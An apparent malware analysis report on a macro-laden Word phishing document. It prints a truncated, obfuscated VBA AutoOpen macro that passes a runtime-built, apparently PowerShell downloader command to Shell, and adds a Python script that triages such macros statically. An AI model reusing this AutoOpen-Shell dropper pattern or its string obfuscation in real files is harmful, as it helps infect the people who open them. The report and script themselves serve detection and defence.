Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b2938bbd574d71fe…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 172.0 KB
Created: 2017-12-14 12:10:00
Authoring application: Microsoft Office Word
First seen: 2017-12-24
MD5: ca9914be9819345508d2653f1bf40640
SHA-1: 444dfe12b7f1e06bc7cbdfd7b483cfba87c6ae57
SHA-256: b2938bbd574d71feac693e9d07f8aef129e02f5f175009e7b8cfcb3dafd245d0
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample contains a VBA project whose module WpApPdjlNzvM defines an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. AutoOpen calls VBA.Shell with the return value of the function FjTRNSVMnAMWmr, which assembles its command line at runtime from Mid() slices cut out of junk-padded string literals. The slices visible in the extracted source carry PowerShell-style fragments ([CHAr]117, .replaCe('JHW',[sTrIng][chaR]39), .replaCe('eCx',[sTrIng][chaR]36)) and the broken-up URL prefix ttp://sec, which is consistent with an obfuscated PowerShell downloader that fetches and runs a second-stage payload; the full command line is not recoverable from the truncated preview. The remaining statements (string concatenations assigned to unused variables and sums of IsNull() results) appear to be padding inserted to disguise the macro. The ClamAV detection name Img.Dropper.PhishingLure-6443153-0 is consistent with dropper/phishing-lure behaviour.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    The macro calls VBA.Shell with an argument that is not a string literal but the return value of a function defined in the same module, so the command line only exists at runtime.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    The module defines Sub AutoOpen(), a Word auto-execution entry point that runs when the document is opened with macros enabled.
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
    Note: the "no modern VBA project was recovered" wording does not hold for this sample, whose VBA project was recovered as macros.bas below; this hit fires on the same AutoOpen token as OLE_VBA_AUTOOPEN and should not be counted as independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    Note: this is the standard DrawingML XML namespace URI that Office writes into embedded drawing and chart parts; it is never contacted at runtime and is not an indicator. The URL worth reconstructing is the one the macro assembles piecewise inside FjTRNSVMnAMWmr (see the Mid() slices in the preview below).

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 73615 bytes
SHA-256: f0619fce13b98d7d3b2ed55c2005a13d9525e007565edba93a4cc1dee940cf49
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WpApPdjlNzvM"
Sub AutoOpen()
BGqvAFcFpzS = "zoBDLzNYU" + "ckNRsDDnoGZ" + "ErZmDTDHvfVuwi" + "jBkXBHZiFii" + "YBCKMtBjJ" + "YwtUMjwPSTJ" + "UlEiXqfMTD" + "FiGtVIAwwU" + "codjuti" + "QODzjQFdWLEwK" + "bopFmbGSXK" + "PIPFqvl"
cnFBfacPfik = "XuHMorpHHkzrtu" + "HqYfQTShh" + "mJfJLanmQh" + "BDQzGiXspO" + "lIVZHzUa" + "MaqChJz" + "JKFcMwGmHjJpup" + "IdXWomToRqbIa" + "ORzjbiiIj" + "MOmzSLlKXi" + "YJmJJpWnllnj" + "tOMITGMzzw"
ZzUVGFQl = "fpIKXRsIVvnZi" + "FEwcrQVib" + "cjKVAjjU" + "nuEFBlB" + "EdCLkrmPR" + "cZUWwOwh" + "HXHpOTWuSBwwr" + "CRFYzrrYFjYDu" + "RzpHUwuqwonr" + "wTOSLljSF" + "pwpwjRXQLYodU" + "qcuvLUQl"
duErRMSK = "LGAIiALYZ" + "bTZTwCbiqo" + "laErMBia" + "DtNZROL" + "wuknutJnEbGo" + "ibWIZjwQSwjwT" + "iFABkrtkw" + "TqjuDHa" + "lQZRrQshPR" + "wDpbabiDZVz" + "tfTpjzBNKXJMCt" + "NkJCccEAz"
VBA.Shell$ FjTRNSVMnAMWmr, 0
PGTVEABnUjm = "aJhNDVYucY" + "KUTQTVTofTLT" + "irGWHYiMipJAUO" + "jbFBqZIAkk" + "SAsHFOpoiMPB" + "DqUjfJQwHvFDN" + "dUarVmYG" + "UWkvLjjMTaSz" + "EbVaUkLEmErELT" + "UtPOzHz" + "vOFRXjld" + "MdPwWuRouihSsq"
MirZLEAsFSZLPT = "VBavrhEGwzzZC" + "SrCXFEsrLSr" + "lKjwjCVH" + "jrzzRIYt" + "NizOnbXnKOv" + "pIDiwuaBPvE" + "UlzFYnwUwlENPW" + "FYvsGMfrit" + "VNwrKSZBuB" + "SPWRafEEqOZ" + "VcUDzjouQL" + "SiVGamo"
cVdGfVolA = "iDGwqdOqPbSFH" + "GMEjFYdS" + "BwBrWoh" + "woHlIwWr" + "rkXNuXORzTRFj" + "JMBEzolsBiS" + "RzZwQirMjt" + "oGZnaWVPDRMwZH" + "WDGziouaFOsBD" + "NTvPRMwZBLVf" + "OCFBAqYLo" + "hKGufTZ"
End Sub
Function FjTRNSVMnAMWmr()
wMFOX = IsNull("AWNmcbl") + IsNull("VbidKbMKZnpwb") + IsNull("idzKLhu") + IsNull("CqEXViGlOthjKn") + IsNull("UwCATjV") + IsNull("ZiwskmRPDzXYs") + IsNull("mFdDnYwQut")
idjYspPa = IsNull("jHwJRhHVzG") + IsNull("kwoFDqCvbdID") + IsNull("ppFlQijvQfQZn") + IsNull("FmzRiwi") + IsNull("RAkuQzTp") + IsNull("YDLUbcWFUXqUTY") + IsNull("PnzIdMdGJiX")
cNMdzHdMzn = Mid("LkWOijdV10'+'6+[CHAr]117+[CH'+'Ar]120),[StrInG][CHAr]39)) ').replaCe('JHW',[sTrIng][chaR]39).replaCe('eCx',[sTrIng][chaR]36))HlPYOvlWNPRibc6jpKSNa", 9, 117)
WlvOb = IsNull("YfLIjbRhBitYq") + IsNull("zwdijnOMuL") + IsNull("WPswsIjDBMGFGW") + IsNull("Grqutjnhoc") + IsNull("mLFbLkALJ") + IsNull("YkJWJVoJ") + IsNull("rXHOhXVARQjiE")
zNqjvUi = IsNull("MjEJJztzj") + IsNull("cHYlYpFiR") + IsNull("zjkLGiz") + IsNull("IfVIwOBKuNpo") + IsNull("OrjqdUnQMBTZl") + IsNull("fvtDbzNqEt") + IsNull("JJjNvssdNi")
qIGVvfaR = IsNull("aVYzZAWFvM") + IsNull("iHhXkLwX") + IsNull("kvfzYEqkivadTQ") + IsNull("AlYPJVlbuEzP") + IsNull("chElLHjiqbZVK") + IsNull("WzmjOrwXzniN") + IsNull("wTksZoBHBqo")
rLvThMjab = Mid("Qjuxpjux+juxs.JH'+'W+JHWjux+juxde/'+'Njux+juxDHjux+juxhsgdetjux+'+'jux3juJHW+JHWx+jux,bYqwfkiGKVOMQ8pPuqciIHYkm", 2, 85)
vqPikU = IsNull("BUdOLQvdCjMtW") + IsNull("BKOpbXmpW") + IsNull("KECRJavYmp") + IsNull("YaNnwvbrkwQNwu") + IsNull("iolKDLzJDHOi") + IsNull("cnoHjVcjBB") + IsNull("cLwmWurDXbv")
SsjvsAWRaT = IsNull("fmQIVodWY") + IsNull("FkBQPKUmzQ") + IsNull("opFZDqBWGIXj") + IsNull("zfEXXFstFiLnG") + IsNull("SHnqnairwKjRwb") + IsNull("SNhBMTkFwOtXsi") + IsNull("umwsjPTS")
iJhCVOZS = IsNull("mbmibQJf") + IsNull("QHOzIIjdRwdm") + IsNull("hsMLmIP") + IsNull("HtjfBjtm") + IsNull("SrVzMEj") + IsNull("NlKaFcRVjtuVP") + IsNull("BQXIOhRHcnr")
GntbOJKmCw = Mid("cVUB4KHx'+'+jux random;xjux+'+'juxEMbcjux+juxdjux+jux = 47jux+jux5hjux+juxttp://secjux+HvW3", 8, 80)
AziIdOW = IsNull("ILFitoFHRtnQ") + IsNull("luiiBqbuDmI") + IsNull("QwVGskzvwsBN") + IsNull("MHImGwu") + IsNull("QACNAOcrpEYwzd") + IsNull("kBYJoVfttQhpi") + IsNull("HznNqzvSs")
btzMzfJJ = IsNull("OJIOIponvYaSj") + IsNull("BouPwSI") + IsNull("lSwifDz") + IsNull("oEFFqJzNs") + IsNull("AUSiRdJQ") + IsNull("pPcqJiOYqP") + IsNull("JknfjWNaLs")
FHLsrs = IsNull("WWDIocQEiPXkh") + IsNull("GZlHIzTYtZhHl") + IsNull("HdwSJjnRRWER") + IsNull("dGTuWPw") + IsNull("QOnJvYzd") + IsNull("aj
... (truncated)
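The following Python script is an added worked example; it is not part of this report and not oletools code. It performs the two checks that the OLE_VBA_AUTOOPEN and OLE_VBA_SHELL heuristics above encode (auto-execution entry points, Shell calls and whether their argument is built at runtime) and, in addition, statically evaluates the Mid() slices and the literal concatenations from the preview so the hidden fragments can be read without ever opening the document. The regular expressions, the helper names and the AUTOEXEC_NAMES list are this example's own choices; the sample input consists of statements copied from the macro preview above, cut down to the lines the triage needs.

```python
"""Static triage of an extracted VBA module: auto-exec entry points, Shell()
calls, and offline evaluation of Mid()/concatenation string building."""
import re

# Constructed input: statements copied from the macros.bas preview on this
# page, reduced to the lines needed for the demonstration.
SAMPLE_VBA = r'''Attribute VB_Name = "WpApPdjlNzvM"
Sub AutoOpen()
BGqvAFcFpzS = "zoBDLzNYU" + "ckNRsDDnoGZ" + "ErZmDTDHvfVuwi" + "jBkXBHZiFii"
VBA.Shell$ FjTRNSVMnAMWmr, 0
End Sub
Function FjTRNSVMnAMWmr()
wMFOX = IsNull("AWNmcbl") + IsNull("VbidKbMKZnpwb") + IsNull("idzKLhu")
cNMdzHdMzn = Mid("LkWOijdV10'+'6+[CHAr]117+[CH'+'Ar]120),[StrInG][CHAr]39)) ').replaCe('JHW',[sTrIng][chaR]39).replaCe('eCx',[sTrIng][chaR]36))HlPYOvlWNPRibc6jpKSNa", 9, 117)
rLvThMjab = Mid("Qjuxpjux+juxs.JH'+'W+JHWjux+juxde/'+'Njux+juxDHjux+juxhsgdetjux+'+'jux3juJHW+JHWx+jux,bYqwfkiGKVOMQ8pPuqciIHYkm", 2, 85)
GntbOJKmCw = Mid("cVUB4KHx'+'+jux random;xjux+'+'juxEMbcjux+juxdjux+jux = 47jux+jux5hjux+juxttp://secjux+HvW3", 8, 80)
End Function
'''

# Word/Excel auto-execution procedure names this example checks for (subset).
AUTOEXEC_NAMES = ("AutoOpen", "AutoExec", "AutoClose", "AutoNew", "AutoExit",
                  "Document_Open", "Document_Close", "Workbook_Open")
PROC_RE = re.compile(r'^\s*(?:Public\s+|Private\s+)?(?:Sub|Function)\s+(\w+)',
                     re.IGNORECASE | re.MULTILINE)
# Shell / VBA.Shell / Shell$ followed by its first argument (identifier or literal);
# the lookbehind keeps "WScript.Shell" and the \b keeps "ShellExecute" out.
SHELL_RE = re.compile(
    r'(?<![\w.])(?:VBA\.)?Shell(?:\$|\b)\s*\(?\s*([A-Za-z_]\w*|"(?:[^"]|"")*")',
    re.IGNORECASE)
MID_RE = re.compile(
    r'^\s*(\w+)\s*=\s*Mid\(\s*"((?:[^"]|"")*)"\s*,\s*(\d+)\s*,\s*(\d+)\s*\)',
    re.IGNORECASE | re.MULTILINE)
CONCAT_RE = re.compile(
    r'^\s*(\w+)\s*=\s*((?:"(?:[^"]|"")*"\s*\+\s*)+"(?:[^"]|"")*")\s*$',
    re.MULTILINE)
STR_RE = re.compile(r'"((?:[^"]|"")*)"')


def unescape(lit):
    # VBA escapes a double quote inside a literal by doubling it.
    return lit.replace('""', '"')


def vba_mid(s, start, length):
    # VBA Mid(s, start, length) is 1-based and clips at the end of the string.
    if start < 1 or length < 0:
        raise ValueError("Mid: start must be >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def procedures(src):
    return [m.group(1) for m in PROC_RE.finditer(src)]


def find_autoexec(src):
    wanted = {n.lower() for n in AUTOEXEC_NAMES}
    return [p for p in procedures(src) if p.lower() in wanted]


def find_shell_calls(src):
    """(argument, built_at_runtime) for each Shell call. The flag is True when
    the argument is a procedure defined in the same source, i.e. the command
    line only exists once the macro has run (VBA names are case-insensitive)."""
    procs = {p.lower() for p in procedures(src)}
    return [(m.group(1), m.group(1).lower() in procs) for m in SHELL_RE.finditer(src)]


def recover_mid_literals(src):
    # Evaluate every `name = Mid("literal", start, length)` without running VBA.
    return {m.group(1): vba_mid(unescape(m.group(2)), int(m.group(3)), int(m.group(4)))
            for m in MID_RE.finditer(src)}


def recover_concats(src):
    # Evaluate every `name = "a" + "b" + ...` made only of literals.
    return {m.group(1): "".join(unescape(p) for p in STR_RE.findall(m.group(2)))
            for m in CONCAT_RE.finditer(src)}


def triage(src):
    mids = recover_mid_literals(src)
    concats = recover_concats(src)
    shells = find_shell_calls(src)
    # Fragments carrying PowerShell-style obfuscation or part of a URL.
    marker = re.compile(r'\[char\]|\.replace\(|://', re.IGNORECASE)
    fragments = list(mids.values()) + list(concats.values())
    return {
        "autoexec": find_autoexec(src),
        "shell_calls": shells,
        "shell_arg_is_runtime_built": any(built for _, built in shells),
        "mid_slices": mids,
        "concat_strings": concats,
        "interesting_fragments": [f for f in fragments if marker.search(f)],
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

The recovered slices still contain the placeholder tokens (JHW, eCx, jux) that the PowerShell .replace() calls would substitute at runtime; the two substitutions visible in the preview map JHW to a single quote (chr 39) and eCx to a dollar sign (chr 36). The substitution for jux is not in the truncated preview, so the script deliberately does not guess it; reconstructing the complete command line needs the full macros.bas.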